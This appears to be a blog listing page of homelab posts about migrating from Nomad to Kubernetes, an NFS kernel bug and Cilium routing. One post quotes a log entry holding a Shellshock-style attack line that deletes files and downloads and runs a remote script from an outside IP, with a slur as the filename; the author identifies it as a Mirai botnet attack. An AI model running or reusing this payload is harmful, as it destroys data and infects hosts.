The HashiCorp Nomad and Kubernetes logos, connected with an arrow pointing from Nomad to Kubernetes

Nomad to k8s, Part 7: Ansible Plays for Host Updates

Wherein I add the Kubernetes nodes to my host update Ansible playbook. This is part eight of my k8s migration series. With the number of hosts I’ve now got in my Homelab, I definitely need a better way to update them than manually SSH’ing into each. So a while ago, I created an Ansible playbook to update all hosts in my Homelab. These updates are also one of the reasons I keep so many physical hosts, even if they’re individually relatively small: I want an environment where I can take down any given host for updates without anything at all breaking, and especially without having to take the entire lab down before a regular host update. ...

February 17, 2024 · 10 min · Michael

NFS problems with new Ubuntu 22.04 kernel

Yesterday’s Homelab host update did not go as intended at all. I hit a kernel bug in the NFS code. To describe the problem, I need to go into a bit of detail on my setup, so please bear with me. I’ve got a fleet of eight Raspberry Pi CM4s and a single Udoo x86 II forming the backbone of the compute in my Homelab. All of them netboot, with no per-host storage at all. To be able to do host updates, including kernels, the boot files used for netbooting are separated per host, and each host’s files are mounted to that host’s /boot/firmware dir via NFS. It looks something like this: ...

February 17, 2024 · 6 min · Michael

Nomad to k8s, Part 6: Logging with FluentD, Fluentbit and Loki

Wherein I document how I migrated my logging setup from Nomad to k8s. This is part seven of my k8s migration series. Setup overview: Let’s start with an overview of the setup. (Figure: overview of my logging pipeline.) ...

February 13, 2024 · 30 min · Michael

Sunday Morning Panic

I just had a slight Sunday morning panic. I finished my logging setup last night, and had a look at my FluentD logs this morning to see whether I got any errors or unparsed logs. At the very top of the logs, I got this entry:

error="#<Fluent::Plugin::Parser::ParserError: pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\", \"time\":\"2024-02-11T04:54:25+01:00\"}'>" location= tag=services.traefik.traefik.docker.anon time=1707623665 record="{ \"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\" }\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" message="dump an error event: error_class=Fluent::Plugin::Parser::ParserError error=\"pattern not matched with data '{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}'\" location=nil tag=\"services.traefik.traefik.docker.anon\" time=2024-02-11 03:54:25.149520221 +0000 record={\"log\"=>\"{ :; }; echo ; /bin/bash -c 'rm -rf *; cd /tmp; wget http://192.3.152.183/nigga.sh; chmod 777 nigga.sh; ./nigga.sh'\\\", \\\"time\\\":\\\"2024-02-11T04:54:25+01:00\\\"}\", \"logsubstream\"=>\"docker\", \"nomad_job_id\"=>\"traefik\", \"nomad_task_name\"=>\"traefik\", \"nomad_node_name\"=>\"anon\"}" host=anon level=warning

That looked suspicious, to say the least. After some googling for the nigga.sh file, I landed on this page from Akamai. It describes an attack by the Mirai botnet. ...

February 11, 2024 · 4 min · Michael

Nomad to k8s, Part 2b: Asymmetric Routing

Wherein I ran into some problems with the Cilium BGP routing and firewalls on my OPNsense box. This is the second addendum for Cilium load balancing in my k8s migration series. While working on my S3 bucket migration, I ran into several rather weird problems. After switching my internal wiki over to using the Ceph RGW S3 from my k8s Ceph Rook cluster, I found that the final upload of the generated site to the S3 bucket from which it was served did not work, even though I had all the necessary firewall rules configured. The output I was getting looked like this: ...

February 4, 2024 · 10 min · Michael